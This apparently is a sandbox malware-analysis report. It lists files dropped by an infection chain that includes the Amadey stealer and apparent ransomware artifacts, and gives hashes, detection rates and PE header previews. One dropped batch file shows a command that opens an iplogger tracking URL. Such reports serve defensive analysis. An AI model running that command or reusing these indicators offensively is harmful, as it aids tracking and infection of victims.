SHA-512:	7F0BD6103DD802DE4A4665B460C8C178F32E6075094532EC43C83FC1D8595D9495772BF191669F4B72CC2D78F91B06E046A11BBD0EF935B040EEB31E741D2A32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000397001\taskhost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	196
Entropy (8bit):	5.098952451791238
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezocKqD:J0+oxBeRmR9etdzRxGez1T
MD5:	62962DAA1B19BBCC2DB10B7BFD531EA6
SHA1:	D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
SHA-256:	80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
SHA-512:	9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.

C:\Users\user\AppData\Local\Temp\1000398001\winlog.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	196
Entropy (8bit):	5.098952451791238
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezocKqD:J0+oxBeRmR9etdzRxGez1T
MD5:	62962DAA1B19BBCC2DB10B7BFD531EA6
SHA1:	D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
SHA-256:	80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
SHA-512:	9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.

C:\Users\user\AppData\Local\Temp\1000399001\msedge.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	196
Entropy (8bit):	5.098952451791238
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezocKqD:J0+oxBeRmR9etdzRxGez1T
MD5:	62962DAA1B19BBCC2DB10B7BFD531EA6
SHA1:	D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
SHA-256:	80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
SHA-512:	9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.

C:\Users\user\AppData\Local\Temp\2899.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4311960
Entropy (8bit):	7.988386694777695
Encrypted:	false
SSDEEP:	98304:3lhp/+MAY8LSBetbsJnYPJay0ram2uVyHV/vsKO4IVa8TY/jpHwrG:3lT/+M2+BeVsJYPms9vsd3Va8M/jpL
MD5:	0E9A9AD0E4EBD15E6071E303C58B0671
SHA1:	885ABDE3076C283A01A285909A3E64F9A9D3DB56
SHA-256:	FEDAFB7544CEE0AF557257F7FFF18B1E7219540F24B059E2F532326A2650EBC9
SHA-512:	16B404898636E83261A762AF81383B52451336A757E5DDF28AEBCF1C868A1D679F6173DAFDE78925C5574581A92EC96C153E868AA0FAD38AAB1FB48BFA97F14D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1bc.1bc.1bc./0...bc./0..'bc./0..bc.....6bc.1bb.bc./0..0bc./0..0bc./0..0bc.Rich1bc.........................PE..L.....&c..................@..b{.....y>........@...@.................................\.B.....................................d.@.P....`..X.............A............. ............................... ...@............................................text...Z.@.......@................. ..`.data...x.y...@.......@.............@....rsrc...X....`........@.............@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\C5F5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	314368
Entropy (8bit):	6.535628381641966
Encrypted:	false
SSDEEP:	6144:GUG2bcUH6Z0+ReEjhVsJgAmkMAIeuudb8MT8AOacOZS:GU9bIeEdVsJqeuudbFT8SZS
MD5:	55F845C433E637594AAF872E41FDA207
SHA1:	1188348CA7E52F075E7D1D0031918C2CEA93362E
SHA-256:	F9F9B154F928549C7A4B484909F41352048CE8148C678F4EC32C807C1D173A39
SHA-512:	5A9B5E83B41041259060E3A29163CDD5ED271C5D476FA455B40EC9BC32BF4BCDDAF3AA1BA23FAACC2669BE420ACB905677EC4FCFB3D69E7B9F7908AE5CBD18A4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.........................6...........R.......R.......R.................."...........................Rich............................PE..L......d.................z...^......tv............@.......................................@.................................(...d................................/...g..p....................h.......g..@............................................text....x.......z.................. ..`.rdata..^............~..............@..@.data....+...........~..............@....rsrc...............................@..@.reloc.../.......0..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5DA4.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	598016
Entropy (8bit):	7.785877335300717
Encrypted:	false
SSDEEP:	12288:FeRtBVREkMfGNEEmMdMhEecxmG8GBfrhx30UW:WjVRE3GeedjecEG8Crh2B
MD5:	FF43AAE7083352DC2D8251C1E622C737
SHA1:	14164AF2CA3FA106E9A95152BBC810C7B98D7FAB
SHA-256:	0634D2AFEE669D7D5C5193EC04EF7DB10B5B9EDC9DEAA3731143687B8221C6B5
SHA-512:	FC1FAA8A3CDDE70EC9AF8863783C839596533C7E5B43D2155F8EE47E8D7B07399A045700F3412BFCBF9C217CA682F3955F1360275FACC2DE3F275BD83961589E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .'8d.Ikd.Ikd.Ik/.Lje.Ik/.Jjg.Ik/.Mjw.Ik/.Hju.Ikd.Hk..Ik/.Ajn.Ik/..ke.Ik/.Kje.IkRichd.Ik................PE..d..._.............".................P..........@.............................0............`.......... ..................................................U$......D............ ..0...x...T...............................@...........P... ............................text....~.......................... ..`.rdata.. $.......0..................@..@.data...............................@....pdata..D...........................@..@.rsrc...U$.......0..................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\958B.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	767488
Entropy (8bit):	7.745848258017554
Encrypted:	false
SSDEEP:	12288:jqGw0v5K8BI2tcgBjM9m5hS+3HWnEpulYCQgecjePoAoE7y8VJXb6F9f:jqGw0vxbthBj+sh5HWcul2KePkE7y8Va
MD5:	C2AB34E22731EDA5D7BE4450C6D8360F
SHA1:	674696AF77F6AC0125DAF2B616F86FFC73270213
SHA-256:	A37187C1B3FEDCA26B6416E10CDAB4FEAE86E6A5F7140487F3F2D7F2FA088E40
SHA-512:	85A98862B243E6B0397478A4D2D5395F9155DBF4F4D478EA965C4AF7F0E8A554597971E63FB6B92C2E9690C4DB0C074977A362971B4A580D97DE300CE34380D7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 54%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B....}.Q.}.Q.}.Q./eQ.}.Q./sQ.}.Q./tQ(}.Q!..Q.}.Q.}.Q.}.Q./zQ.}.Q./dQ.}.Q./aQ.}.QRich.}.Q................PE..L......d.................N..........+Z.......`....@.......................... #......Z......................................$R..P.....!.X.....................".\|... ................................H..@............................................text....M.......N.................. ..`.data...db...`.......R..............@....rsrc...X.....!......p..............@..@.reloc..^....."..0..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A079.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1167112
Entropy (8bit):	6.190212175229312
Encrypted:	false
SSDEEP:	24576:tXGPYsq6c4EuKrG7AesdV8fj2c183R+7O:Oq6c4E5rG7iufj2cG3RH
MD5:	021EC43150E8C4A615EE09E166D71367
SHA1:	82120AB7D02310CF7DFCC1A1F6C1DCD6C3BF3E67
SHA-256:	7F5CF55FC236D10EF34E1328A922352D0347D0E6C50A0BCDD5CAF44FF1071E86
SHA-512:	57204EFD2DCA24D0479B177B42AC1D765F234B0341874D3854134DDA6A5091FFCB5631283E4E7FBE709357007227013405E60BC0997D5B9C9D2ED56A133EA4AA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T..5...5...5..lG...5..lG...5..lG...5..lG...5...5..<5...I...5...I...5...I...5..~I...5..~I...5..Rich.5..................PE..L.....'e...............".X...v...............p....@.......................................@.....................................(...............................pK......8...............................@............................................text...VV.......X.................. ..`.rdata.._....p.......\..............@..@.data....h.......L..................@....idata...............F..............@..@.00cfg...............X..............@..@.reloc...X.......Z...Z..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A9E0.dll

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2449408
Entropy (8bit):	7.948614663619247
Encrypted:	false
SSDEEP:	49152:Aow37w/HQag4Goug/hS28h0Lp0d6H3k0az1eG6t4u0+rY:AowRagborI2dLpeqk0Ia4u3r
MD5:	9A5C196882CD03714B7DAB68E9EB4068
SHA1:	5D1F92D394AA78E5F6430575E6FE1FC858F6FF59
SHA-256:	0E73C416FEFED93971AE4F58892DCE12E1CE7A4D39073FDC9EFB0BA2330B0A0A
SHA-512:	87A3AF5AC7D02A3837C24DDAE4B4D120A41A1C52E6C9BD297AA3FE53E59628D5ADEC23B17BA50019F6B3F539A0F872AA94281DDDC6D10C98239C8490C39A417B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 22%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v..j.Q.j.Q.j.Q...QQk.Q...Q.k.Q.4.P.k.Q..uQ.j.Q~3.P.j.Q.j.Q.k.Q.8.Q2j.Q...Q[k.Q.4.P.k.Q.4.P.j.QRich.j.Q........PE..L......G...........!......... .......%.......................................`%.......&.............................P...`...D.........$.......................$.`V..@...T...............................................d.......H....................text... ........................... ..`.rdata..............................@..@.data...............................@...DATA....7F#......P#.................@....rsrc.........$.......$................@.reloc..:m....$..p....$................B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B184.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	modified
Size (bytes):	132734
Entropy (8bit):	7.7442810358076315
Encrypted:	false
SSDEEP:	3072:Bf1BDZ0kVB67Duw9AMcybGFAjrYEOnEjbWicBGIgPjzgw0XIu0I/2jAM:B9X0G0fjrkJiUgPH/ubXM
MD5:	6D57BE58312131CB7672F3D72BF1B5A1
SHA1:	3DEC741A0E5B7271416AD09DBD35BE896F07C939
SHA-256:	E000E93034AA809E36C2C270DB09F90D9F68949645C3C6D3C7922EBEC2B01F13
SHA-512:	6CB7236D81543A32BAAB42F60CD77C17EAFDAB11C014520E01A699F85AC74995466F9C3020BA449A4422CB9275665799B57A8B1D40D73AEDAF3EF42045B307CE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG.sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...\|......H3............@.......................................@.................................D...........(............................................................................................................text...Wd.......f.................. ..`.rdata...............j..............@..@.data...8U...........~..............@....ndata...................................rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C5F5.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	314368
Entropy (8bit):	6.535628381641966
Encrypted:	false
SSDEEP:	6144:GUG2bcUH6Z0+ReEjhVsJgAmkMAIeuudb8MT8AOacOZS:GU9bIeEdVsJqeuudbFT8SZS
MD5:	55F845C433E637594AAF872E41FDA207
SHA1:	1188348CA7E52F075E7D1D0031918C2CEA93362E
SHA-256:	F9F9B154F928549C7A4B484909F41352048CE8148C678F4EC32C807C1D173A39
SHA-512:	5A9B5E83B41041259060E3A29163CDD5ED271C5D476FA455B40EC9BC32BF4BCDDAF3AA1BA23FAACC2669BE420ACB905677EC4FCFB3D69E7B9F7908AE5CBD18A4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\C5F5.exe, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\C5F5.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.........................6...........R.......R.......R.................."...........................Rich............................PE..L......d.................z...^......tv............@.......................................@.................................(...d................................/...g..p....................h.......g..@............................................text....x.......z.................. ..`.rdata..^............~..............@..@.data....+...........~..............@....rsrc...............................@..@.reloc.../.......0..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F3CC.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	244224
Entropy (8bit):	6.764879130063167
Encrypted:	false
SSDEEP:	3072:63aKwIaGuPp23k9glbLSlpm1C5Lf1CBHpg0Tr:sBhaSk9eEf8vT
MD5:	F5B8B275A0CAFBA82D26D3725CBA78C3
SHA1:	579B6FB9B7D6DE72AB108AA3B84A65C666E8CE84
SHA-256:	97B19AD61A37B6D8ABAC68890FC36D824989EF23440F4913D64F9051DBB1DF00
SHA-512:	39097F6BD905AC717EFD760B4CD9A3317C4B5A360A434F6A0768218583DD6147376943A14F26555E09AA4D243452447D6B982432350CFCB6162DD6D56653D937
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1bc.1bc.1bc./0...bc./0..'bc./0..bc.....6bc.1bb.bc./0..0bc./0..0bc./0..0bc.Rich1bc.........................PE..L..../Nc.................X..........y>.......p....@..........................0...............................................[..P.......X........................... ............................... ...@............................................text....V.......X.................. ..`.data...xb...p.......\..............@....rsrc...X............z..............@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\tlatest.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\5DA4.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	44
Entropy (8bit):	4.661263085029031
Encrypted:	false
SSDEEP:	3:/qQKWYD0dCCAhs:/kL0dCCAq
MD5:	00BCD37E362E6D90E1285251FC5450E4
SHA1:	079B1D1F632603581AEC90D970B0D3CC75947784
SHA-256:	39F99A25B3F8AF6CF697864B9E0B3F0D8B949B3D8BC688FB9D94A769013369C2
SHA-512:	94301B2AAC8A8A9332196AC42CB4333A149A60DFA20B182ACBF1E1B69C779C72212E80EAD055B0AC8BACF09B1625822BCBD84A85B49007DC8AFD0E013EB0CE02
Malicious:	false
Preview:	@ECHO OFF..start https://iplogger.com/2Xtsj4

C:\Users\user\AppData\Local\Temp\IXP000.TMP\treelatest.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\5DA4.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	536064
Entropy (8bit):	7.8864901669522105
Encrypted:	false
SSDEEP:	6144:iahOxMB67r1l/94IuKHEE8NAMwcfVHed9VuxEe2Va1xmGbGD75Gfz24hX2r65OLb:iiYMErWMEEyEd3cEe5xmGbGMfrhXX3x
MD5:	8D87A6A419052B5AB9E38574E0F8B9E2
SHA1:	9417ACECB32489D735CBB57A3E10489E0E2E2BAE
SHA-256:	4F081CA6DAD29C4528D40A56EDCCC0859778D055D25B4FB8B129746C9C9A7EE1
SHA-512:	B3CBC7F9D45F0F34ADA582774FF42B8DF163C996112C58D2FE1DDE89F6300785622544810332CCF9A4D390984D8626F68F3712164FA9D83E3A13C65E44399C7C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6..7...6..7...6..7...6..7...6...6...6..7...6..o6...6..7...6Rich...6................PE..d................."......\|.....................@..........................................`.......... ......................................<.........../}...................p.. .......T...........................................(... ............................text....{.......\|.................. ..`.rdata...".......$..................@..@.data...............................@....pdata..............................@..@.rsrc.../}.......~..................@..@.reloc.. ....p.......,..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\bowsakkdestx.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	559
Entropy (8bit):	6.0367176464319545
Encrypted:	false
SSDEEP:	12:YGJ68VCymOkZQv6L9QJQhZwJ16n5EhAR3GdG5FTbryQ4:YgJ0bOoQiCzJ165jR3GdGnbGr
MD5:	122FF82890BA004F43B2DEC1D2BB3855
SHA1:	33B85D2794353271843172DD4A99DCF7B508DB28
SHA-256:	4A7B9367316B63CB87F9691279C20E0147A1D9465F902E32806F2AD10014EC90
SHA-512:	F3BE71A3303FFD531B895FAF3AA652403B4D201307B21FBE4EAB2292C89CB89AABC12FBA2AFF54459D5E578972624923A38850C8D5964CA5440D1B8EC3875654
Malicious:	false
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqjGuLm953WsyCRcw+iWJ\\nL3KRGfABVHa0iHYuV9shhKDYL4muxVv2HfoarGcwr\/MOPHVtPeEvtkxfDI2YEd0S\\nfbtpb\/9Pa\/meDCCetZFo\/NIledFZVdVM4zuYLhWEKxJ4Mq8nRFw7I6Qci862eYTk\\nSXwn04ouNh\/OsYNT5AALw4r7KMyZkSNGMO9azoKKwuDtCQnDPOZvwL1UuLh73WKf\\nLpOkVy+w422xw+LDPrRNmsfgb+qBlbg+EDlgPVqsXfPlgY4jUf8VdXlDr3OE7LC4\\nEeQ28ctcibQkSvDNaLpTzVGnQ+QPBPuY+xpHoQFQRL8zWWH3magM8zL7MyRDJUKa\\n0QIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5"}

C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	767488
Entropy (8bit):	7.745848258017554
Encrypted:	false
SSDEEP:	12288:jqGw0v5K8BI2tcgBjM9m5hS+3HWnEpulYCQgecjePoAoE7y8VJXb6F9f:jqGw0vxbthBj+sh5HWcul2KePkE7y8Va
MD5:	C2AB34E22731EDA5D7BE4450C6D8360F
SHA1:	674696AF77F6AC0125DAF2B616F86FFC73270213
SHA-256:	A37187C1B3FEDCA26B6416E10CDAB4FEAE86E6A5F7140487F3F2D7F2FA088E40
SHA-512:	85A98862B243E6B0397478A4D2D5395F9155DBF4F4D478EA965C4AF7F0E8A554597971E63FB6B92C2E9690C4DB0C074977A362971B4A580D97DE300CE34380D7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 54%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B....}.Q.}.Q.}.Q./eQ.}.Q./sQ.}.Q./tQ(}.Q!..Q.}.Q.}.Q.}.Q./zQ.}.Q./dQ.}.Q./aQ.}.QRich.}.Q................PE..L......d.................N..........+Z.......`....@.......................... #......Z......................................$R..P.....!.X.....................".\|... ................................H..@............................................text....M.......N.................. ..`.data...db...`.......R..............@....rsrc...X.....!......p..............@..@.reloc..^....."..0..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\afsretg

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	244224
Entropy (8bit):	6.764879130063167
Encrypted:	false
SSDEEP:	3072:63aKwIaGuPp23k9glbLSlpm1C5Lf1CBHpg0Tr:sBhaSk9eEf8vT
MD5:	F5B8B275A0CAFBA82D26D3725CBA78C3
SHA1:	579B6FB9B7D6DE72AB108AA3B84A65C666E8CE84
SHA-256:	97B19AD61A37B6D8ABAC68890FC36D824989EF23440F4913D64F9051DBB1DF00
SHA-512:	39097F6BD905AC717EFD760B4CD9A3317C4B5A360A434F6A0768218583DD6147376943A14F26555E09AA4D243452447D6B982432350CFCB6162DD6D56653D937
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1bc.1bc.1bc./0...bc./0..'bc./0..bc.....6bc.1bb.bc./0..0bc./0..0bc./0..0bc.Rich1bc.........................PE..L..../Nc.................X..........y>.......p....@..........................0...............................................[..P.......X........................... ............................... ...@............................................text....V.......X.................. ..`.data...xb...p.......\..............@....rsrc...X............z..............@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\irbgfai

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	248887
Entropy (8bit):	7.99926910569371
Encrypted:	true
SSDEEP:	3072:ihJgC2XyGvhu5QLh9HrdJYssWcbP6Ett+ZRM4kREiH2L2I7OWDyR/3bwqnXSc+ME:i6CGZu5QLXLdJYpWsN/EbpYDXSaxKs2
MD5:	07AFA4546EE09862492AC327FF6255A7
SHA1:	8A5CCC04A4C2C54312AC0A0D83A3A17986613071
SHA-256:	44ED226861B132DE84D20F84E7C63BF9D59546A014BEF6F9EBD09402F9844C99
SHA-512:	A3A582077C3B96A7199B97D96B9FE9E325157997134D3E98173BE52E57C08F50C11C7579E5A84BB1BE0A67702F5D9CA852E8E0EA4A472160ACC689113F5B8FE5
Malicious:	false
Preview:	..~...(.$G......r..<.tH....8.7$.fjYI..vO....`4...._...#.;.....!...G`.T..N3...../R..}...oe...J..3......6.UC%u#...^.S.\..A..T.)..O.H...u.v...M.\%b...#[....F..T.c4f.q......^1.%.7..)..6...2H.^.Uk....C.p..d.&..C....8..n..`..Zr.X..r ..D5..{..4.@.c..o.q.2gB.y..pZ<c..k../.z.....\F.Y..P.....l...R}.\.1$.h~I..CK.l?P..6v...3....~..S;..tfQ..`F.p..ORJ?M+.....%.@Q.../u..K.Xt.)o7+.f.Q.S..l.....W...d.u..o.bJ...#y.k.......UbHKZ-......$..7!) ..A)Z....6.W.............+..WFt]./.o.h......[.rt..uIy..{.D.I..{...gn.{.q..&.M....AK0......h.j....E]V. .....Qu../=..hTN .e..........1.....R.R.....9..M~.[}.L.z.^.$.vd.}8SEt.t.\|K.....R.y..D...e..0...n.".<A.".......%.#[)...h......`.Y#w..&...6....h.xf.c....)W+..3.w.4....8..&%..8.gZ,!.D.....%d..y3}:.....RY..U....v...n...C...)...0.6..ZX...%......r..Shl.........B.}....G....G..n.@.~~>.E...#D.J.U.......}..."..W..-....R._^.s..d.H"Z9U.=U.q.+X...a.a..Y....)l.."h..BB......3..E}...R..)<...~p.9.;!....T..Z.z...3..b.CKz@B..C..

C:\Users\user\AppData\Roaming\vusretg

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	244736
Entropy (8bit):	6.753904568661947
Encrypted:	false
SSDEEP:	3072:azmo3RLrcfbfhlxEPxfnbo7lwThYkoALvY2z5Lf1cZ0pg0Tr:j+Nrcjhkb2lMh/dfeAT
MD5:	178AE4687EE8A5761D2003DFD45EFDCE
SHA1:	23FBE6BB9B67EB068B746B1518DA3C3B91C5E219
SHA-256:	9F6B062D11DFEB51158B9D133C7AD76051DFEF5678F6AF292E87DD464C6AA50F
SHA-512:	57E20EEB88F4E190036082AE567B3CBA3BFA82F63C7010C7721546268950367666FF399E2F9790AD056E598DF840BBB8D130BD62A817F88B7A939FFE8150DDF2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1bc.1bc.1bc./0...bc./0..'bc./0..bc.....6bc.1bb.bc./0..0bc./0..0bc./0..0bc.Rich1bc.........................PE..L...\|[.d.................Z..........y>.......p....@..........................0..............................................4]..P.......X........................... ............................... ...@............................................text...X.......Z.................. ..`.data...xb...p.......^..............@....rsrc...X............\|..............@..@.reloc...(.........................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\vusretg:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\BJZFPPWAPT.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85989416740232
Encrypted:	false
SSDEEP:	24:ja8UJOvlGGZxPm+WOpheZHOsKUjVRyschThuslGcOevahdUBT6cCK4TQXSxEzEbH:u7KlGIhZWOphSuuONh9ccO4ahOBMTQS1
MD5:	62D39A7B64CCE12C8C7AB4FB36D53248
SHA1:	87234E6ADF05C3384962AC6805F564041F9AB256
SHA-256:	AFA1EE837E2B687A39BB6FA52394BA6431C466868106073887DB83368B7BDBF2
SHA-512:	E33967D5E32217030EA272165A24F38FE589C80B013B60B9740E5FE4CC6F6B66530822BD4175B92BDABD7FAED2C30BBF16BBBBC865B5C88D04C8787EBA458101
Malicious:	false
